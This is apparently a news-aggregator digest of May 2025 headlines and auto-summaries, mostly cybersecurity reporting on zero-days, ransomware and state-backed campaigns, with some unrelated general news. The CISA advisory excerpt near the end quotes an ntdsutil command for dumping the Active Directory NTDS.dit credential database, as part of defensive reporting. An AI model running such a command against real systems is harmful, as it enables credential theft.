Autosummary: a:ivanti:endpoint_manager_mobile:11.12.0.3:*:*:*:*:*:*:* cpe:2.3:a:ivanti:endpoint_manager_mobile:12.3.0.0:*:*:*:*:*:*:* (fixed in 11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1). Download Portal: https://forums.ivanti.com/s/product-downloads. The vulnerabilities have been addressed with versions 11.12.0.5, 12.3.0.2, 12.4.0.2, or 12.5.0.1.


Smashing Security podcast #417: Hello, Pervert! – Sextortion scams and Discord disasters

financial
2025-05-14 https://grahamcluley.com/smashing-security-podcast-417/
Don't get duped, doxxed, or drained! In this episode of "Smashing Security" we dive into the creepy world of sextortion scams, and investigate how crypto wallet firm Ledger's Discord server was hijacked in an attempt to phish for cryptocurrency recovery phrases. All this and more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault. Plus! Don't miss our featured interview with Drata's Matt Hillary.

Autosummary: Hosts: Graham Cluley: @grahamcluley.com @[email protected]; Carole Theriault: @caroletheriault. Episode links: Sponsored by: Drata – The world’s most advanced Trust Management platform – making risk and compliance management accessible, continuous, and 10x more automated than ever before.


At least 21 killed in crash in Mexico, official says

latam
2025-05-14 https://www.bbc.com/news/articles/cp3nz3126xxo
Several other people have been injured and are receiving medical treatment, a local official says.



Letting off steam: How Dominica's volcanoes will boost its green energy

industry
2025-05-14 https://www.bbc.com/news/articles/c4gezw5n579o
The Caribbean island is building a power station that will use steam naturally heated by volcanic rock.

Autosummary: Gemma Handy, Business reporter, reporting from St John’s, Antigua. (Ormat: The new geothermal power plant will access steam from boiling hot, natural underground reservoirs.) With rainforests, waterfalls, volcanoes and hot springs, the Caribbean island of Dominica's dramatic landscape is a haven for adventure-seeking ecotourists. "Ormat is doing the entire project, from making the plant's elements, shipping them to Dominica, mainly from Israel, and then constructing the power plant."


Breaking down silos in cybersecurity

ciber
2025-05-13 https://www.helpnetsecurity.com/2025/05/13/marc-gafan-ionix-tyson-kopczynski-cymetry-one-cybersecurity-silos/

All organizations erect silos – silos between groups and departments, across functions and among technologies. Silos represent differences in practices, culture and operations. Their presence inhibits communication and collaboration. As companies scale from startup to mid-sized and beyond, silos multiply and ossify. As operations expand from one site to many, from on-premises to cloud, from legacy to emerging tech (e.g., cloud and AI), silos don’t topple; they persist and proliferate. Nowhere are silos more evident … More

The post Breaking down silos in cybersecurity appeared first on Help Net Security.


Autosummary: Practitioners continue to acquire and juggle tool sets directed at endpoints, applications, network security, vulnerability management, cloud security, threat hunting and myriad other domains. Additionally, significant time and effort are spent identifying who is responsible for specific tasks, which could be the security team, product team, DevOps or even business units. As operations expand from one site to many, from on-premises to cloud, from legacy to emerging tech (e.g., cloud and AI), silos don’t topple; they persist and proliferate.


Review: Resilient Cybersecurity

ciber
2025-05-13 https://www.helpnetsecurity.com/2025/05/13/review-resilient-cybersecurity/

Resilient Cybersecurity touches on nearly every major function of enterprise cybersecurity, from threat detection and identity management to vendor risk and regulatory compliance. About the author Mark Dunkerley is a cybersecurity and technology leader with over 20 years of experience working in higher education, healthcare and Fortune 100 companies. Inside the book The structure of the book mirrors the process of building a cybersecurity program from the ground up. Early chapters focus on understanding the … More

The post Review: Resilient Cybersecurity appeared first on Help Net Security.


Autosummary: From there, he devotes individual chapters to each major program component, including vulnerability management, architecture, operations, awareness and training, and proactive services.


Cybersecurity jobs available right now: May 13, 2025

ciber
2025-05-13 https://www.helpnetsecurity.com/2025/05/13/cybersecurity-jobs-available-right-now-may-13-2025/

The post Cybersecurity jobs available right now: May 13, 2025 appeared first on Help Net Security.


Autosummary: Computer Network Defense Analyst (RealmOne | USA | On-site): As a Computer Network Defense Analyst, you will utilize information from various sources, such as intrusion detection systems, firewalls, network traffic logs, and host system logs, to identify potential vulnerabilities, respond to cyber events, and defend against possible threats. IT Specialist III – Lead Security Analyst (City of Irvine | USA | On-site): As an IT Specialist III – Lead Security Analyst, you will lead the monitoring, detection, investigation, and response to security incidents using SIEM, EDR, and threat intelligence platforms. Lead Security Consultant – Offensive Security (Cyderes | Canada | Remote): As a Lead Security Consultant – Offensive Security, you will lead and execute advanced penetration tests across internal/external networks, web/mobile apps, APIs, cloud, and wireless environments. Network Security Specialist – L2 (Global Relay | United Kingdom | Hybrid): As a Network Security Specialist – L2, you will be responsible for assisting in engineering, long-term strategies, planning, integration, and deployments pertaining to the IT network. Senior InfoSec Compliance Analyst (Onit | India | On-site): As a Senior InfoSec Compliance Analyst, you will lead the planning and execution of security audits; assess, implement, and maintain new compliance frameworks or controls; and lead cross-functional projects for certifications or attestations.


AI vs AI: How cybersecurity pros can use criminals’ tools against them

ciber
2025-05-13 https://www.helpnetsecurity.com/2025/05/13/ai-proxies-cybersecurity/

For a while now, AI has played a part in cybersecurity. Now, agentic AI is taking center stage. Based on pre-programmed plans and objectives, agentic AI can make choices which optimize results without a need for developer intervention. As agentic AI can be programmed for various tasks, AI agents are set to create a labor revolution, from manufacturing to customer service. However, this comes at a cost, as they can also be programmed to conduct … More

The post AI vs AI: How cybersecurity pros can use criminals’ tools against them appeared first on Help Net Security.


Autosummary: Weighing up the good and bad: While cybersecurity experts acknowledge the dangers of agentic AI, there is plenty of room for the technology to be developed for good, as we can already see in AI-powered tools for cybersecurity and intelligence gathering. Eventually, AI agents will neutralize social engineering attacks by removing their human link, just like with Daisy, the sweet old AI timewaster.


Moldovan Police Arrest Suspect in €4.5M Ransomware Attack on Dutch Research Agency

exploits ransomware
2025-05-13 https://thehackernews.com/2025/05/moldovan-police-arrest-suspect-in-45m.html
Moldovan law enforcement authorities have arrested a 45-year-old foreign man suspected of involvement in a series of ransomware attacks targeting Dutch companies in 2021. "He is wanted internationally for committing several cybercrimes (ransomware attacks, blackmail, and money laundering) against companies based in the Netherlands," officials said in a statement Monday. In conjunction with the



Türkiye Hackers Exploited Output Messenger Zero-Day to Drop Golang Backdoors on Kurdish Servers

exploits
2025-05-13 https://thehackernews.com/2025/05/turkiye-hackers-exploited-output.html
A Türkiye-affiliated threat actor exploited a zero-day security flaw in an Indian enterprise communication platform called Output Messenger as part of a cyber espionage attack campaign since April 2024. "These exploits have resulted in a collection of related user data from targets in Iraq," the Microsoft Threat Intelligence team said. "The targets of the attack are associated with the Kurdish

Autosummary: In the next phase, the threat actor uses "OMServerService.vbs" to invoke "OM.vbs" and "OMServerService.exe," the latter of which is a Golang backdoor that contacts a hard-coded domain ("api.wordinfos[.]com") for data exfiltration.


M&S says customer data stolen in cyberattack, forces password resets

ciber
2025-05-13 https://www.bleepingcomputer.com/news/security/mands-says-customer-data-stolen-in-cyberattack-forces-password-resets/
Marks and Spencer (M&S) confirms that customer data was stolen in a cyberattack last month, when ransomware was used to encrypt servers. [...]



North Korean Konni APT Targets Ukraine with Malware to track Russian Invasion Progress

exploits rusia-ucrania
2025-05-13 https://thehackernews.com/2025/05/north-korean-konni-apt-targets-ukraine.html
The North Korea-linked threat actor known as Konni APT has been attributed to a phishing campaign targeting government entities in Ukraine, indicating the threat actor's targeting beyond Russia. Enterprise security firm Proofpoint said the end goal of the campaign is to collect intelligence on the "trajectory of the Russian invasion." "The group's interest in Ukraine follows historical targeting

Autosummary: Konni APT, also known as Opal Sleet, Osmium, TA406, and Vedalia, is a cyber espionage group that has a history of targeting entities in South Korea, the United States, and Russia. The LNK files are configured to launch a decoy HWP file and run PowerShell commands, leading to the execution of files named toy03.bat, toy02.bat, and toy01.bat (in that order), the last of which contains shellcode to launch RoKRAT, a staple malware associated with APT37.


Moldovan Police arrested a 45-year-old foreign man participating in ransomware attacks on Dutch companies

exploits ransomware
2025-05-13 https://securityaffairs.com/177772/cyber-crime/moldovan-police-arrested-a-45-year-old-foreign-man-participating-in-ransomware-attacks-on-dutch-companies.html
A 45-year-old foreign man has been arrested in Moldova for allegedly participating in ransomware attacks on Dutch companies in 2021. Moldovan police arrested the 45-year-old foreign man as a result of a joint international operation involving Moldovan and Dutch authorities. He is internationally wanted for multiple cybercrimes, including ransomware attacks, blackmail, and money laundering, targeting […]

Autosummary: On May 6, 2025, Moldovan law enforcement searched the suspect’s home and car, seizing key evidence linked to cybercrimes, including €84,800 in cash, an e-wallet, laptops, a phone, a tablet, six bank cards, and multiple storage devices.


APT group exploited Output Messenger Zero-Day to target Kurdish military operating in Iraq

exploits
2025-05-13 https://securityaffairs.com/177758/apt/apt-group-exploited-output-messenger-zero-day-to-target-kurdish-military-operating-in-iraq.html
A Türkiye-linked group used an Output Messenger zero-day to spy on Kurdish military targets in Iraq, collecting user data since April 2024. Since April 2024, the threat actor Marbled Dust (aka Sea Turtle, Teal Kurma, SILICON and Cosmic Wolf) has exploited a zero-day flaw (CVE-2025-27920) in Output Messenger to target Kurdish military-linked users […]

Autosummary: Since April 2024, the threat actor Marbled Dust (aka Sea Turtle, Teal Kurma, SILICON and Cosmic Wolf) has exploited a zero-day flaw (CVE-2025-27920) in Output Messenger to target Kurdish military-linked users in Iraq, collecting user data and deploying malicious files.


Outrage in Peru as ancient site daubed with obscene graffiti

latam
2025-05-13 https://www.bbc.com/news/articles/c8rejddyyjdo
A video shared on social media shows a man spray painting an original wall of the pre-Columbian site.



Fortinet fixes critical zero-day exploited in FortiVoice attacks

exploits
2025-05-13 https://www.bleepingcomputer.com/news/security/fortinet-fixes-critical-zero-day-exploited-in-fortivoice-attacks/
Fortinet released security updates to patch a critical remote code execution vulnerability exploited as a zero-day in attacks targeting FortiVoice enterprise phone systems. [...]



Two years’ jail for down-on-his-luck man who sold ransomware online

exploits ransomware
2025-05-13 https://www.bitdefender.com/en-us/blog/hotforsecurity/two-years-jail-for-down-on-his-luck-man-who-sold-ransomware-online
A man has been jailed in Ireland for two years after pleading guilty to offences related to his illegal online business that sold ransomware and other malware, as well as stolen credit card details, and false bank accounts. Read more in my article on the Hot for Security blog.

Autosummary: But he was found to be in possession of materials designed to create fake payment cards, and a substantial amount of Bitcoin, Ethereum, Litecoin, Dogecoin, Monero, XLM, Dash, and Cardano cryptocurrency. Mazhar, of Douglas, Cork, has been jailed for two years after pleading guilty to offences related to his illegal online business that sold ransomware and other malware, as well as stolen credit card details, and false bank accounts.


Ivanti EPMM vulnerabilities exploited in the wild (CVE-2025-4427, CVE-2025-4428)

exploits
2025-05-13 https://www.helpnetsecurity.com/2025/05/13/ivanti-epmm-vulnerabilities-exploited-in-the-wild-cve-2025-4427-cve-2025-4428/

Attackers have exploited vulnerabilities in open-source libraries to compromise on-prem Ivanti Endpoint Manager Mobile (EPMM) instances of a “very limited” number of customers, Ivanti confirmed on Tuesday, and urged customers to install a patch as soon as possible. “The investigation is ongoing and Ivanti does not have reliable atomic indicators [of compromise] at this time. Customers should reach out to our Support Team for guidance,” the company said. CVE-2025-4427 and CVE-2025-4428 The exploited vulnerabilities … More

The post Ivanti EPMM vulnerabilities exploited in the wild (CVE-2025-4427, CVE-2025-4428) appeared first on Help Net Security.


Autosummary: They didn’t have a CVE number when Ivanti reported them to the maintainers of the open-source libraries, but they have now: CVE-2025-4427 is an authentication bypass flaw that allows attackers to access protected resources without proper credentials; CVE-2025-4428 is a remote code execution vulnerability that allows attackers to execute arbitrary code on the target system. The vulnerabilities have been flagged by CERT-EU, the cybersecurity service for the institutions, bodies, offices and agencies of the European Union, so it’s likely that they have been exploited as zero-days (i.e., vulnerabilities unknown to the libraries’ developers and without a patch) to breach some of those institutions.


China-Linked APTs Exploit SAP CVE-2025-31324 to Breach 581 Critical Systems Worldwide

exploits
2025-05-13 https://thehackernews.com/2025/05/china-linked-apts-exploit-sap-cve-2025.html
A recently disclosed critical security flaw impacting SAP NetWeaver is being exploited by multiple China-nexus nation-state actors to target critical infrastructure networks. "Actors leveraged CVE-2025-31324, an unauthenticated file upload vulnerability that enables remote code execution (RCE)," EclecticIQ researcher Arda Büyükkaya said in an analysis published today. Targets of the campaign

Autosummary: In addition, three different Chinese hacking groups have been observed exploiting the SAP NetWeaver vulnerability as part of efforts to maintain remote access, conduct reconnaissance, and drop malicious programs: CL-STA-0048, which has attempted to establish an interactive reverse shell to "43.247.135[.]53," an IP address previously identified as used by the threat actor; UNC5221, which has leveraged a web shell to deploy KrustyLoader, a Rust-based malware that can be used to serve second-stage payloads like Sliver, set up persistence, and execute shell commands; and UNC5174, which has leveraged a web shell to download SNOWLIGHT, a loader that initiates a connection with a hard-coded server to fetch a Go-based remote access trojan named VShell and a backdoor known as GOREVERSE. "China-linked APTs are highly likely to continue targeting internet-exposed enterprise applications and edge devices to establish long-term strategic and persistence access to critical infrastructure networks globally," Büyükkaya said.


SAP patches second zero-day flaw exploited in recent attacks

exploits
2025-05-13 https://www.bleepingcomputer.com/news/security/sap-patches-second-zero-day-flaw-exploited-in-recent-attacks/
SAP has released patches to address a second vulnerability exploited in recent attacks targeting SAP NetWeaver servers as a zero-day. [...]

Autosummary: "The attacks we observed during March 2025 (that started with basic probes back in January 2025) are actually abusing both, the lack of authentication (CVE-2025-31324) as well as the insecure de-serialization (CVE-2025-42999)," Perez-Etchegoyen told BleepingComputer.


Ivanti fixes EPMM zero-days chained in code execution attacks

exploits
2025-05-13 https://www.bleepingcomputer.com/news/security/ivanti-fixes-epmm-zero-days-chained-in-code-execution-attacks/
Ivanti warned customers today to patch their Ivanti Endpoint Manager Mobile (EPMM) software against two security vulnerabilities chained in attacks to gain remote code execution. [...]

Autosummary: (Ivanti EPMM instances exposed online, per Shadowserver.) Today, Ivanti also released security updates to address a critical authentication bypass vulnerability (CVE-2025-22462) impacting its Neurons for ITSM IT service management solution that can let unauthenticated attackers gain administrative access.


Microsoft May 2025 Patch Tuesday fixes 5 exploited zero-days, 72 flaws

exploits
2025-05-13 https://www.bleepingcomputer.com/news/microsoft/microsoft-may-2025-patch-tuesday-fixes-5-exploited-zero-days-72-flaws/
Today is Microsoft's May 2025 Patch Tuesday, which includes security updates for 72 flaws, including five actively exploited and two publicly disclosed zero-day vulnerabilities. [...]

Autosummary: The number of bugs in each vulnerability category is listed below: 17 Elevation of Privilege Vulnerabilities; 2 Security Feature Bypass Vulnerabilities; 28 Remote Code Execution Vulnerabilities; 15 Information Disclosure Vulnerabilities; 7 Denial of Service Vulnerabilities; 2 Spoofing Vulnerabilities. This count does not include Azure, Dataverse, Mariner, and Microsoft Edge flaws that were fixed earlier this month. The actively exploited zero-day vulnerability in today's updates is: CVE-2025-30400 - Microsoft DWM Core Library Elevation of Privilege Vulnerability. Microsoft fixed an exploited elevation of privileges vulnerability that gives attackers SYSTEM privileges.


Patch Tuesday: Microsoft fixes 5 actively exploited zero-days

exploits
2025-05-13 https://www.helpnetsecurity.com/2025/05/13/patch-tuesday-microsoft-fixes-5-actively-exploited-zero-days/

On May 2025 Patch Tuesday, Microsoft has released security fixes for 70+ vulnerabilities, among them five actively exploited zero-days and two publicly disclosed (but not exploited) vulnerabilities. The zero-days and the publicly disclosed flaws Among the zero-days patched is a memory corruption vulnerability in the Windows scripting engine (CVE-2025-30397) that is being exploited to remotely execute malicious code. “The user would have to click on a specially crafted URL to be compromised by the attacker,” … More

The post Patch Tuesday: Microsoft fixes 5 actively exploited zero-days appeared first on Help Net Security.

"

Autosummary: “SharePoint services, especially those used as internal document stores, can be a treasure trove for threat actors looking to steal data, especially data that may be leveraged to force ransom payments using double extortion techniques by threatening to release the stolen data if payment is not made,” said Kev Breen, Senior Director Threat Research at Immersive. "


Zero-day exploited to compromise Fortinet FortiVoice systems (CVE-2025-32756)

exploits
2025-05-13 https://www.helpnetsecurity.com/2025/05/13/zero-day-exploited-to-compromise-fortinet-fortivoice-systems-cve-2025-32756/

Fortinet has patched a critical vulnerability (CVE-2025-32756) that has been exploited in the wild to compromise FortiVoice phone / conferencing systems, the company’s product security incident response team has revealed on Tuesday. About CVE-2025-32756: CVE-2025-32756 is a stack-based overflow vulnerability that can lead to remote code and command execution by unauthenticated attackers. To trigger it, they only need to send a specially crafted HTTP request to a specific API. According to the Fortinet PSIRT, the … More

The post Zero-day exploited to compromise Fortinet FortiVoice systems (CVE-2025-32756) appeared first on Help Net Security.

"

Autosummary: "


How Interlock Ransomware Affects the Defense Industrial Base Supply Chain

exploits ransomware industry
2025-05-13 https://securityaffairs.com/177792/malware/how-interlock-ransomware-affects-the-defense-industrial-base-supply-chain.html
Interlock Ransomware’s attack on a defense contractor exposed global defense supply chain details, risking operations of top contractors and their clients. Resecurity envisions the cascading effects on the defense supply chain due to ransomware activity. In the recent incident, by attacking a defense contractor, Interlock Ransomware uncovered details about the supply chains and operations […] "

Autosummary: "


Marks and Spencer confirms data breach after April cyber attack

financial
2025-05-13 https://securityaffairs.com/177784/data-breach/marks-and-spencer-confirms-data-breach-after-april-cyber-attack.html
Marks and Spencer (M&S) confirms that threat actors stole customer data in the ransomware attack that hit the company in April. In April, Marks and Spencer Group plc (M&S) announced it had been managing a cyber incident in recent days with the help of external cyber security experts. Customers report outages affecting card payments, gift […] "

Autosummary: “The personal data taken could include contact details – such as name, email address, addresses, telephone number – date of birth, online order history, household information and ‘masked’ payment card details used for online purchases. The stolen M&S data may include contact info, birthdate, order history, household data, and masked card details, but not full payment info. "


Layoffs pose a cybersecurity risk: Here’s why offboarding matters

ciber
2025-05-12 https://www.helpnetsecurity.com/2025/05/12/offboarding-employees-security-risks/

In this Help Net Security video, Chase Doelling, Principal Strategist at JumpCloud, discusses the overlooked security risks associated with improper offboarding. Though many organizations focus on securely onboarding new employees, they often overlook the security risks associated with properly offboarding workers, especially when offboarding happens en masse and unexpectedly. The process of offboarding can be complex and urgent, often requiring IT teams to act quickly to deactivate access. However, many security teams are already stretched … More

The post Layoffs pose a cybersecurity risk: Here’s why offboarding matters appeared first on Help Net Security.

"

Autosummary: "


How to give better cybersecurity presentations (without sounding like a robot)

ciber
2025-05-12 https://www.helpnetsecurity.com/2025/05/12/how-to-give-better-cybersecurity-presentations/

Most people think great presenters are born with natural talent. Luka Krejci, a presentation expert, disagrees. “They are called presentation skills. Skills, not talent,” he says. “Any skill, be it dancing, football, or presenting, can be developed only if you commit and practice.” So, the first step is obvious: Quit avoiding presentations. The more you do them, the better you’ll get. Content first, delivery second: We tend to focus on the performance side of presenting: … More

The post How to give better cybersecurity presentations (without sounding like a robot) appeared first on Help Net Security.

"

Autosummary: “Even super technical people enjoy everyday language, stories, examples, metaphors, or even humor,” he says. “Any skill, be it dancing, football, or presenting, can be developed only if you commit and practice.” “We usually start our presentations by introducing ourselves, the topic, and the agenda,” Krejci notes. Content first, delivery second: We tend to focus on the performance side of presenting: body language, tone, gestures. "


Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures

exploits
2025-05-12 https://thehackernews.com/2025/05/fake-ai-tools-used-to-spread.html
Threat actors have been observed leveraging fake artificial intelligence (AI)-powered tools as a lure to entice users into downloading an information stealer malware dubbed Noodlophile. "Instead of relying on traditional phishing or cracked software sites, they build convincing AI-themed platforms – often advertised via legitimate-looking Facebook groups and viral social media campaigns," "

Autosummary: Once unsuspecting users upload their image or video prompts on these sites, they are then asked to download the supposed AI-generated content, at which point a malicious ZIP archive ("VideoDreamAI.zip") is downloaded instead. "


Resecurity One simplifies cybersecurity operations

ciber
2025-05-12 https://www.helpnetsecurity.com/2025/05/12/resecurity-one/

Resecurity launched Resecurity One, the next-generation cybersecurity platform designed to improve how organizations approach cybersecurity. Resecurity One combines Digital Risk Management, Cyber Threat Intelligence, Endpoint Protection, Identity Protection, Supply Chain Risk Monitoring, and xDR capabilities into a unified solution, providing comprehensive protection against evolving cyber threats. Resecurity One is a breakthrough in cybersecurity technology that addresses the challenges faced by organizations of all sizes in managing multiple cybersecurity products. By integrating various cybersecurity functionalities into … More

The post Resecurity One simplifies cybersecurity operations appeared first on Help Net Security.

"

Autosummary: Resecurity One combines Digital Risk Management, Cyber Threat Intelligence, Endpoint Protection, Identity Protection, Supply Chain Risk Monitoring, and xDR capabilities into a unified solution, providing comprehensive protection against evolving cyber threats. Benefits of the Resecurity One platform: Resecurity One, as a Platform as a Service (PaaS), brings several key advantages to organizations. Reduced fragmentation: By integrating multiple cybersecurity functions into a single platform, Resecurity One eliminates the need for disparate security tools, thereby reducing complexity and enhancing operational efficiency. "


⚡ Weekly Recap: Zero-Day Exploits, Developer Malware, IoT Botnets, and AI-Powered Scams

financial exploits industry
2025-05-12 https://thehackernews.com/2025/05/weekly-recap-zero-day-exploits.html
What do a source code editor, a smart billboard, and a web server have in common? They’ve all become launchpads for attacks—because cybercriminals are rethinking what counts as “infrastructure.” Instead of chasing high-value targets directly, threat actors are now quietly taking over the overlooked: outdated software, unpatched IoT devices, and open-source packages. It’s not just clever—it’s "

Autosummary: This week’s list includes — CVE-2025-32819, CVE-2025-32820, CVE-2025-32821 (SonicWall), CVE-2025-20188 (Cisco IOS XE Wireless Controller), CVE-2025-27007 (OttoKit), CVE-2025-24977 (OpenCTI), CVE-2025-4372 (Google Chrome), CVE-2025-25014 (Elastic Kibana), CVE-2025-4318 (AWS Amplify Studio), CVE-2024-56523, CVE-2024-56524 (Radware Cloud Web Application Firewall), CVE-2025-27533 (Apache ActiveMQ), CVE-2025-26168, CVE-2025-26169 (IXON VPN), CVE-2025-23123 (Ubiquiti UniFi Protect Cameras), CVE-2024-8176 (libexpat), and CVE-2025-47188 (Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones). With support for cloud services (S3, GCS, Firebase), databases (MySQL, PostgreSQL, MongoDB, Redis), messaging apps (Slack), and local file systems, it uses advanced OCR and pattern-matching to uncover sensitive data hidden in documents, images, archives, and even videos. "Despite vendor customizations in USB stacks, ChoiceJacking attacks gain access to sensitive user files (pictures, documents, app data) on all tested devices from 8 vendors including the top 6 by market share," researchers Florian Draschbacher, Lukas Maar, Mathias Oberhuber, and Stefan Mangard said. The attacks, detected in January, March, and April 2025, targeted current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGOs, as well as individuals connected to Ukraine. "Although these activities often include basic and elementary intrusion techniques, the presence of poor cyber hygiene and exposed assets can escalate these threats, leading to significant consequences such as defacement, configuration changes, operational disruptions and, in severe cases, physical damage," the agencies said. Built for speed and simplicity, it allows investigators to quickly search through Windows Event Logs, MFT files, Shimcache, SRUM, and registry hives using keyword matching, regex, and Sigma detection rules. "By targeting browsers, authentication tokens, and system files, it enables cybercriminals to perform identity theft, corporate espionage, and unauthorized financial transactions," Flashpoint said. The flaws, tracked as CVE-2025-2775, CVE-2025-2776, CVE-2025-2777 (CVSS scores: 9.3), and CVE-2025-2778, have been addressed in version 24.4.60 b16 of the software. — The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Environmental Protection Agency (EPA), and Department of Energy (DOE) are urging critical infrastructure entities to review and take steps to bolster their security posture amid "cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States." "


Ancelotti set to leave Real Madrid to coach Brazil

latam
2025-05-12 https://www.bbc.com/sport/football/articles/clyg2127419o
Real Madrid boss Carlo Ancelotti is set to leave the Spanish club at the end of the season to become the new national team coach of Brazil. "

Autosummary: "


Moldova arrests suspect linked to DoppelPaymer ransomware attacks

exploits ransomware
2025-05-12 https://www.bleepingcomputer.com/news/security/moldova-arrests-suspect-linked-to-doppelpaymer-ransomware-attacks/
Moldovan authorities have detained a 45-year-old suspect linked to DoppelPaymer ransomware attacks targeting Dutch organizations in 2021. [...] "

Autosummary: "


ASUS Patches DriverHub RCE Flaws Exploitable via HTTP and Crafted .ini Files

exploits
2025-05-12 https://thehackernews.com/2025/05/asus-patches-driverhub-rce-flaws.html
ASUS has released updates to address two security flaws impacting ASUS DriverHub that, if successfully exploited, could enable an attacker to leverage the software in order to achieve remote code execution. DriverHub is a tool that’s designed to automatically detect the motherboard model of a computer and display necessary driver updates for subsequent installation by communicating with a "

Autosummary: "


Hackers now testing ClickFix attacks against Linux targets

Linux
2025-05-12 https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/
A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible. [...] "

Autosummary: Instructions for Linux users (Source: Hunt.io). The command drops the "mapeal.sh" payload on the target’s system, which, according to Hunt.io, does not perform any malicious actions in its current version, limited to fetching a JPEG image from the attacker’s server. "


Output Messenger flaw exploited as zero-day in espionage attacks

exploits
2025-05-12 https://www.bleepingcomputer.com/news/security/output-messenger-flaw-exploited-as-zero-day-in-espionage-attacks/
A Türkiye-backed cyberespionage group exploited a zero-day vulnerability to attack Output Messenger users linked to the Kurdish military in Iraq. [...] "

Autosummary: "


U.S. CISA adds TeleMessage TM SGNL to its Known Exploited Vulnerabilities catalog

exploits
2025-05-12 https://securityaffairs.com/177743/hacking/u-s-cisa-adds-telemessage-tm-sgnl-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds TeleMessage TM SGNL flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a TeleMessage TM SGNL flaw, tracked as CVE-2025-47729 (CVSS score of 1.9), to its Known Exploited Vulnerabilities (KEV) catalog. “The TeleMessage archiving backend through 2025-05-05 holds cleartext copies of […] "

Autosummary: “The TeleMessage archiving backend through 2025-05-05 holds cleartext copies of messages from TM SGNL (aka Archive Signal) app users, which is different functionality than described in the TeleMessage “End-to-End encryption from the mobile phone through to the corporate archive” documentation, as exploited in the wild in May 2025.” reads the advisory. Though not all data was accessed, the threat actor hacked the company in just 20 minutes, raising national security concerns, especially as top U.S. officials, including Waltz, were using the tool during sensitive discussions. "


How can we counter online disinformation? | Unlocked 403 cybersecurity podcast (S2E2)

ciber
2025-05-12 https://www.welivesecurity.com/en/videos/online-disinformation-unlocked-403-cybersecurity-podcast-s2e2/
Ever wondered why a lie can spread faster than the truth? Tune in for an insightful look at disinformation and how we can fight one of the most pressing challenges facing our digital world. "

Autosummary: "


Russian GRU Targeting Western Logistics Entities and Technology Companies

industry rusia-ucrania
2025-05-12 https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a

Executive Summary

This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.

Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.

This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.

The following authors and co-sealers are releasing this CSA:

  • United States National Security Agency (NSA)
  • United States Federal Bureau of Investigation (FBI)
  • United Kingdom National Cyber Security Centre (NCSC-UK)
  • Germany Federal Intelligence Service (BND) Bundesnachrichtendienst
  • Germany Federal Office for Information Security (BSI) Bundesamt für Sicherheit in der Informationstechnik
  • Germany Federal Office for the Protect "

    Autosummary:

    Introduction: For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions. These accounts contained information on aid shipments to Ukraine, including: sender, recipient, train/plane/ship numbers, point of departure, destination, container registration numbers, travel route, and cargo contents.

    Co-sealers (continuation of the list above; some entries survive only as the agency’s native-language name):
      • Militaire Inlichtingen- en Veiligheidsdienst
      • Bezpečnostní informační služba
      • Poland Internal Security Agency (ABW) Agencja Bezpieczeństwa Wewnętrznego
      • Poland Military Counterintelligence Service (SKW) Służba Kontrwywiadu Wojskowego
      • United States Cybersecurity and Infrastructure Security Agency (CISA)
      • United States Department of Defense Cyber Crime Center (DC3)
      • United States Cyber Command (USCYBERCOM)
      • Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)

    The countries with targeted entities include the following, as illustrated in Figure 1: Bulgaria, Czech Republic, France, Germany, Greece, Italy, Moldova, Netherlands, Poland, Romania, Slovakia, Ukraine, United States.
    Figure 1: Countries with Targeted Entities

    Initial Access TTPs: To gain initial access to targeted entities, unit 26165 actors used several techniques, including (but not limited to):
      • Credential guessing [T1110.001] / brute force
    The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables
    Redirector services used include: Webhook[.]site, FrgeIO, InfinityFree, Dynu, Mocky, Pipedream, Mockbin[.]org.

    Post-compromise activity: … [T1021.001] to access additional hosts and attempt to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as in Figure 2:
      C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit
    Figure 2: Example Active Directory Domain Services command
    Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory.

    Tools (list fragment):
      • … – An open source Python script for finding insecure passwords stored in Group Policy Preferences
      • ldap-dump.py – A script for enumerating user accounts and other information in Active Directory

    There were a number of known malware variants tied to this campaign against logistics sector victims, including: HEADLACE [7], MASEPIE [8]. While other malware variants, such as OCEANMAP and STEELHOOK [8], were not directly observed targeting logistics or IT entities, their deployment against victims in other sectors in Ukraine and other Western countries suggests that they could be deployed against logistics and IT entities should the need arise.

